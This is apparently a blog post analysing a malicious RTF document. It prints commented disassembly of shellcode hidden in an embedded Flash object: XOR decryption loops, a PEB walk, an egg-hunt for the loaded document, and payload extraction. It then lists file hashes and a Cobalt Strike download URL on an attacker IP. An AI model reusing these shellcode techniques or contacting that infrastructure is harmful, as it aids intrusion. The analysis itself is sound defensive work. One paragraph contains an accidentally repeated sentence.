Quick Sunday morning blog post, analysis of an unknown rtf file. This article is a result of an initial investigation, no attribution is done but you’ll have all the necessary info for a deeper investigation.
The malicious document has SHA256: 5D9E1F4DAB6929BC699BA7E5C4FD09F2BBFD6B59D04CEFD8F4BF06710E684A5E.
After a first glance I thought to know what’s behind the rft, but running a specific script I got disappointed by the result. For a quick response, a submission to a sandbox could be the best option you have, but you’ll miss all the fun! I decided to manually check using an hex editor because it’s incredible how you can extract objects in a fast way.
The personal script I tried at the beginning failed to parse extracted objects from the document, too bad but now I know that external objects are inside the file. The first thing to do is to understand why one or more bjects are not correct.
What to look for? Well, I always start checking for known objects, shellcode and things like that.
“465753” (which stands for ‘FWS’, a standard part of the flash file header) is a nice string to put inside the search text box.
![image_1](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_1.png?w=627)
Flash object identification
Seems like the document contains a flash object. According to the Flash file header definition you also know the size of the object, the red box in the picture reveals it: 0x50A1 bytes.
Cut it from the file and paste to a new file (remember to copy as text and paste as hex text).
![image_2](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_2.png?w=627)
Flash object details
Trying to load the new file inside JPEXS flash decompiler doesn’t help too much really. As you can see there’s no code inside, only the suspicious thing represented by the binary data.
Don’t know what’s behind that byte’s sequence, I decided to come back to the hex editor. A closer look at the flash contents reveals a weird sequence of bytes:
![image_3](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_3.png?w=627)
Extra bytes start
![image_4](https://cdn.statically.io/img/zairon.wordpress.com/wp-content/uploads/2017/02/image_4.png?w=627)
Extra bytes end
Seems like the attacker has modified the flash file inserting some extra bytes in it. What’s the meaning of these bytes? Is it a shellcode? Well, to answer this question is pretty easy, just look at it:
010000 4A DEC EDX 010001 4B DEC EBX 010002 4A DEC EDX 010003 4E DEC ESI 010004 43 INC EBX ... 010055 4B DEC EBX 010056 4A DEC EDX 010057 4B DEC EBX 010058 4A DEC EDX 010059 4A DEC EDX 01005A 42 INC EDX 01005B D9 EE FLDZ 01005D D9 74 24 F4 FSTENV (28-BYTE) PTR SS:[ESP-C] 010061 5F POP EDI ; EDI = 1005D 010062 83 C7 2B ADD EDI,2B ; EDI = 0x10086, first byte to decrypt 010065 BA 8A FE FF FF MOV EDX,-176 01006A F7 DA NEG EDX ; EDI = 0x176, number of bytes to decrypt 01006C 31 F6 XOR ESI,ESI 01006E B4 4C MOV AH,4C ; xor key 010070 8A 07 MOV AL,BYTE PTR DS:[EDI] ; get current byte 010072 30 E0 XOR AL,AH ; xor decryption 010074 A8 01 TEST AL,1 010076 75 04 JNZ SHORT 0001007C 010078 FE C0 INC AL 01007A EB 02 JMP SHORT 0001007E 01007C FEC8 DEC AL 01007E 8807 MOV BYTE PTR DS:[EDI],AL ; save the decrypted byte 010080 46 INC ESI 010081 47 INC EDI 010082 39 D6 CMP ESI,EDX 010084 75 EA JNZ SHORT 00010070
The first part of the shellcode is a simple xor decryption algorithm, the real shellcode starts when decryption has done. Here is the second part of the shellcode:
010086 31 C9 XOR ECX,ECX 010088 64 8B 71 30 MOV ESI,DWORD PTR FS:[ECX+30] ; PEB base address 01008C 8B76 0C MOV ESI,DWORD PTR DS:[ESI+C] ; pointer to PEB_LDR_DATA 01008F 8B 76 1C MOV ESI,DWORD PTR DS:[ESI+1C] ; InInitializationOrderModuleList 010092 8B 6E 08 MOV EBP,DWORD PTR DS:[ESI+8] ; base address of the current element 010095 8B 46 20 MOV EAX,DWORD PTR DS:[ESI+20] ; name of the current element 010098 8B 36 MOV ESI,DWORD PTR DS:[ESI] ; next item 01009A 66 39 48 18 CMP WORD PTR DS:[EAX+18],CX ; right dll check based on dll name length 01009E 75 F2 JNZ SHORT 00010092 ; loop until "kernel32.dll" has not been found 0100A0 8B 45 3C MOV EAX,DWORD PTR SS:[EBP+3C] ; PE offset 0100A3 8B 54 05 78 MOV EDX,DWORD PTR SS:[EBP+EAX+78] ; Export table offset 0100A7 01 EA ADD EDX,EBP 0100A9 8B 72 20 MOV ESI,DWORD PTR DS:[EDX+20] 0100AC 01 EE ADD ESI,EBP 0100AE 31 C9 XOR ECX,ECX 0100B0 41 INC ECX 0100B1 AD LODS DWORD PTR DS:[ESI] 0100B2 01 E8 ADD EAX,EBP ; offset of the current export name 0100B4 8B 18 MOV EBX,DWORD PTR DS:[EAX] 0100B6 2B 58 04 SUB EBX,DWORD PTR DS:[EAX+4] 0100B9 81 FB E5 20 DD FF CMP EBX,FFDD20E5 ; search IsBadReadPtr export 0100BF 75 EF JNZ SHORT 000100B0 ; checksum algo over export name 0100C1 49 DEC ECX 0100C2 8B 5A 24 MOV EBX,DWORD PTR DS:[EDX+24] 0100C5 01 EB ADD EBX,EBP 0100C7 66 8B 0C 4B MOV CX,WORD PTR DS:[EBX+ECX*2] 0100CB 8B 5A 1C MOV EBX,DWORD PTR DS:[EDX+1C] 0100CE 01 EB ADD EBX,EBP 0100D0 03 2C 8B ADD EBP,DWORD PTR DS:[EBX+ECX*4] 0100D3 55 PUSH EBP 0100D4 55 PUSH EBP 0100D5 31 DB XOR EBX,EBX 0100D7 66 81 CB FF 0F OR BX,0FFF 0100DC 43 INC EBX 0100DD 6A 08 PUSH 8 0100DF 53 PUSH EBX 0100E0 8B 44 24 08 MOV EAX,DWORD PTR SS:[ESP+8] 0100E4 FF D0 CALL EAX ; IsBadReadPtr 0100E6 85 C0 TEST EAX,EAX 0100E8 75 ED JNZ SHORT 000100D7
The shellcode tries to identify IsBadReadPtr function. After that there’s a loop used to search for a memory space where the calling process has read access. Basically the snippet is used to locate a memory space owned by Word aplication.
0100EA B8 51 51 68 68 MOV EAX,68685151 0100EF 89 DF MOV EDI,EBX 0100F1 AF SCAS DWORD PTR ES:[EDI] ; 1° search 0100F2 75 E8 JNZ SHORT 000100DC 0100F4 AF SCAS DWORD PTR ES:[EDI] ; 2° search 0100F5 ^75 E5 JNZ SHORT 000100DC 0100F7 81 3F 95 95 E8 E8 CMP DWORD PTR DS:[EDI],E8E89595 ; 3° search 010107 B9 02 8D 01 00 MOV ECX,18D02 01010C B8 C5 9D 1C 81 MOV EAX,811C9DC5 010111 BF 93 01 00 01 MOV EDI,1000193 010116 F7 E7 MUL EDI 010118 32 06 XOR AL,BYTE PTR DS:[ESI] 01011A 46 INC ESI 01011B E2 F9 LOOPD SHORT 00010116 01011D 5B POP EBX 01011E 5F POP EDI 01011F 5E POP ESI 010120 3D 17 77 F9 7E CMP EAX,7EF97717 ; right checksum over the 0x18D02 bytes 010125 75 B0 JNZ SHORT 000100D7 ; jump if it's not the right memory space
Search for the bytes sequence “51 51 68 68 51 51 68 68 95 95 E8 E8” in the memory space validated by IsBadReadPtr. The sequence is located at the very beginning of the rtf file, that means the code is used to identify the memory space containing the loaded rtf document.
010127 83 C7 04 ADD EDI,4 ; skip the 12 bytes used to identify the right portion of memory 01012A 59 POP ECX 01012B 57 PUSH EDI ; edi -> 85 95 46 00 DE 00 00 00 E0 ... 01012C 31 C9 XOR ECX,ECX 01012E B6 C1 MOV DH,0C1 010130 BE F6 8C 01 00 MOV ESI,18CF6 010135 8A 17 MOV DL,BYTE PTR DS:[EDI] 010137 80 FA 00 CMP DL,0 01013A 74 09 JE SHORT 010145 01013C 80 C6 07 ADD DH,7 01013F 38 F2 CMP DL,DH 010141 74 02 JE SHORT 00010145 010143 30 F2 XOR DL,DH ; decrypt byte 010145 88 17 MOV BYTE PTR DS:[EDI],DL ; save decrypted byte 010147 41 INC ECX 010148 47 INC EDI 010149 39 F1 CMP ECX,ESI 01014B 75 E8 JNZ SHORT 00010135
Another decryption routine, the decrypted area contains a PE file. Too bad the 0x18CF6 decrypted bytes are not the real payload. The next part of the shellcode helps me to identify the real payload:
0001017F FF D0 CALL EAX ; HeapCreate 00010181 05 00 10 00 00 ADD EAX,1000 00010186 50 PUSH EAX 00010187 FF 74 24 04 PUSH DWORD PTR SS:[ESP+4] ; 1° byte decrypted PE 0001018B 31 C9 XOR ECX,ECX 0001018D C7 00 00 00 00 00 MOV DWORD PTR DS:[EAX],0 00010193 83 C1 04 ADD ECX,4 00010196 83 C0 04 ADD EAX,4 00010199 81 F9 00 90 03 00 CMP ECX,39000 0001019F 75 EC JNZ SHORT 0001018D ;loop used to clean the allocated memory space 000101A1 5E POP ESI 000101A2 5F POP EDI 000101A3 B9 F6 12 00 00 MOV ECX,12F6 ; number of bytes to move: 0x12F6 000101A8 56 PUSH ESI ; move starting from 0x17A00 offset 000101A9 81 C6 00 7A 01 00 ADD ESI,17A00 000101AF 57 PUSH EDI 000101B0 F3 A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] 000101B2 C3 RETN ; jump to the 1° moved byte
Nice, now I can say what the payload is really. The last part of the decrypted block of bytes (len 0x12F6) represents another part of the shellcode. So, if you remove the last 0x12F6 bytes from the decrypted PE file you’ll get the real payload!
Basically the last part of the shellcode is used to perform two distinct actions:
– execute the real payload
– run the Word application passing a fake word document as a parameter. The fake document is created inside the last part of the shellcode. The use of a fake document is a standard operation performed by the actors, they try to fool the victim run the Word application passing a fake word document as a parameter. The fake document is created inside the last part of the shellcode. The use of a fake document is a standard operation performed by the actors, they try to fool the victim hiding their real intentions.
Extracted payload SHA256 is 4c72df74a1e8039c94b188f1c5c59f30ddcc7107647689e4d908e55d04ff8b52. This new file is a downloader used to get the final stage, the real dangerous part of the entire scheme: Cobalt Strike.
To sum-up:
RTF file: 5d9e1f4dab6929bc699ba7e5c4fd09f2bbfd6b59d04cefd8f4bf06710e684a5e Extracted payload: 4c72df74a1e8039c94b188f1c5c59f30ddcc7107647689e4d908e55d04ff8b52 Cobalt Strike artifact url: https://193.238.152.198/OeeC Cobalt Strike artifact: 2fa6ec644b0a05c0cbe7ebaf4cc4905281e65764e91ed299d5cb3f54ab4943bf
(Beware: at the time of writing everything is still up.)
Possible related rtf files:
7a63fc5253deb672036e018750fd40dc3e8502f3b07ef225e7e6bc1144d1d7ee 08c9bd7b7b8361c5d217570019ff012773407337c9083910f2ae3a09b5401345 8e27a641684da744a0882d3664cf84d5a88b8e82ac0070d3602af0b7c103eeeb 9c7208c5c0d431738c8682cf6a2bd81df66977cbabffa0570f9d70518bece912 21dda5c82e5aa5c8545b96dc2d6d63e6786fea73453f5acaa571fd5c0466363d af178ff11088ff59640f74191785adf134aee296652080f397cf282db36fad46 cb743f5057c77069a10ecd9e6b4fd48be096b1502e9fb3548e8a742e284eeae2
Lunch is ready, byebye!
Pingback: 【知识】2月6日 - 每日安全知识热点 - 莹莹之色
Pingback: Week 6 – 2017 – This Week In 4n6
Pingback: 半月安全看看第一期 – 安全0day
Greatt blog I enjoyed reading